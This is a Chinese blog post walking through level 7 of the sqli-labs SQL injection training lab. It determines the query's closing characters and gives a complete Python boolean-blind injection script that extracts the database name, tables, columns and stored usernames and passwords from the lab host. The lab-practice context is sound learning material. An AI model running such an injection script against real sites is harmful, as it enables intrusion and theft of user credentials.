sqli-labs靶场第七关

最新推荐文章于 2024-05-18 15:04:49 发布
最新推荐文章于 2024-05-18 15:04:49 发布
阅读量342 收藏
点赞数 1
文章标签: 数据库 oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyy8910599download/article/details/135889586
版权

7、第七关

id=1' --+单引号报错,id=1" --+双引号不报错,可以判断是单引号闭合

id=1') --+也报错,尝试两个括号闭合,id=1')) --+不报错

接下来用脚本爆库

import string

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ['~', "@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = False
    url = "http://sqli.labs/Less-7/?id=1%27))%20"
    if test:
        print("test")
        res = requests.get(url + "and%20length(database())>10%20--+")
        content_length = len(res.text)
        print(content_length)
    else:
        content_len = 691
        list1 = numbers + letters2 + fuhao
        print(len(list1))
        len1 = 20
        # 获取数据库名长度
        db_length = 0
        for i in range(50):
            url_db = url + f"and%20length(database())={i}%20--+"
            res = requests.get(url_db)
            if "You are in.... Use outfile......" in res.text:
                db_length = i
                break
        print(f"数据库名长度:{db_length}")
        # 获取数据库名
        database = ""
        for p in range(db_length + 1):
            for a in list1:
                url_db = url + f"and%20substr(database(),{p},1)=%22{a}%22%20--+"
                res = requests.get(url_db)
                if "You are in.... Use outfile......" in res.text:
                    database = f"{database}{a}"
                    print(a, end='')
        print(f",数据库:{database}")
        # 获取所有表名
        num = 0
        tables = ""
        for p in range(1000):
            if num > len(list1)*2:
                break
            for a in list1:
                url_db = url + f"and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='{database}'),{p},1)=\"{a}\"%20--+"
                res = requests.get(url_db)
                num += 1
                if "You are in.... Use outfile......" in res.text:
                    tables = f"{tables}{a}"
                    print(a, end='')
                    num = 0
        print(f",所有表名:{tables}")
        # 获取users表所有字段
        columns = ""
        num = 0
        for p in range(1000):
            if num > len(list1)*2:
                break
            for a in list1:
                url_db = url + f"and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{p},1)=\"{a}\"%20--+"
                res = requests.get(url_db)
                num += 1
                if "You are in.... Use outfile......" in res.text:
                    columns = f"{columns}{a}"
                    print(a, end='')
                    num = 0
        print(f",所有字段名:{columns}")
        # 获取所有账号
        users = ""
        num = 0
        for p in range(1000):
            if num > len(list1)*2:
                break
            for a in list1:
                url_db = url + f"and%20substr((select group_concat(username,':',password) from users),{p},1)=\"{a}\"%20--+"
                res = requests.get(url_db)
                num += 1
                if "You are in.... Use outfile......" in res.text:
                    users = f"{users}{a}"
                    print(a, end='')
                    num = 0
        print(f",所有用户密码:{users}")

沧海一粟@星火燎原
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs第七sql注入流程
qq_33598708的博客
04-09 3592
正常访问 http://127.0.0.1/sqli-labs-master/Less-7/?id=1 正常访问以后提示Use outfile..... 什么是outfile:参考地址 MySQL中你可以使用SELECT...INTO OUTFILE语句来简单的导出数据到文本文件上。 判断注入类型 http://127.0.0.1/sqli-labs-master/Less-7/?id=1' and '1'='1 通过注入字符没有报错可以判断是字符类型的,这数据库报错不会提示
sqli-labs第七
学习
08-24 1030
在第五六卡了好几天,终于走到第七了,首先查看源代码可以看到,SQL查询语句为SELECT * FROM users WHERE id=(('3' )) -- ')) LIMIT 0,1 于是构造绕过语句 192.168.18.136/sqli-labs-master/Less-7/?id=3' )) --+ 接下来,我们发现 union 1,2,3一点用都没有 ...
sqli-labs基础篇【第七】详细解析
Lucky小小吴的小屋
01-11 3197
sqli-labs基础篇【第七】详细解析,环境配置和注入判定
详细sqli-labs(1-20)通讲解
m0_57928318的博客
05-18 1520
获取数据库名时可以使用 left() 函数,这里使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。我们可以看出,GET 方式和post 方式 的区别,GET方式 可以明显的 从 URL 中进行注入,POST可以在数据包中进行修改对应的字段来进行 SQL 注入。获取数据库名时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。
sqli-labs-----第7
wyzhxhn的博客
11-09 2137
布尔盲注、一句话木马、利用文件写入爆出信息
使用burpsuite进行布尔盲注(sqli-labs第7)
J14N的博客
01-30 1182
sqli-labs less-7使用burpsuite布尔盲注(纯小白,刚接触sql注入,有更好的办法欢迎评论区留言)
sqli-labs卡7(结合文件上传漏洞+一句马+菜刀)通思路
zyh1588的博客
10-28 1106
小白对sqli-labs第七的理解
sqlilabs第七
wh1sper、的博客
04-11 697
sqlilabs第五前言一、解题二、于into outfile无法成功的问题 前言 没啥说的,直接开整。 一、解题 我这里直接贴源码,就可以看出啥注入类型 看到源码之后输入?id=1’)) ,显示的页面。 题目也告诉我们outfile,说明他的权限开了。 并且这题的字段,表,数据库都和前面的题一样。 我先随便输入点:?id=1’)) union select 1,2,3 into outfile “D:/phpstudy/WWW/sqli-labs-master/Less-7/1.txt”。 虽然他
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
sqli-labs靶场
最新发布
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs 第七 多命通攻略
两个月亮
01-05 1655
错误输入与不正常输入的返回结果是相同的。该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。怎么会这样?等等,我们刚刚得出的结论好像被忽略了:该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。既然返回结果为空都将返回,那我们刚刚构造的判断语句又怎么能够判断出注入类型呢?在遇到读写权限问题后,尝试向搜索引擎寻求帮助,但解决方案大多针对 Linux 操作系统且并不详细,只好自己摸索了。
Sqli-labs——lesson7
weixin_62281892的博客
06-29 502
lesson7
Sqli-labs靶场第7详解[Sqli-labs-less-7]
m0_73615178的博客
02-22 1853
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()
SQLI-labs-第七和第八
weixin_54055099的博客
09-11 436
SQLI第七和第八的解题思路
sqli-labs靶场安装
07-28
7. 完成以上步骤后,您可以通过浏览器访问sqli-labs靶场了。例如,使用http://localhost/sqli-labs/进行访问。 请注意,sqli-labs是一个用于学习和测试SQL注入漏洞的靶场,仅在安全环境中使用。确保在使用时采取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值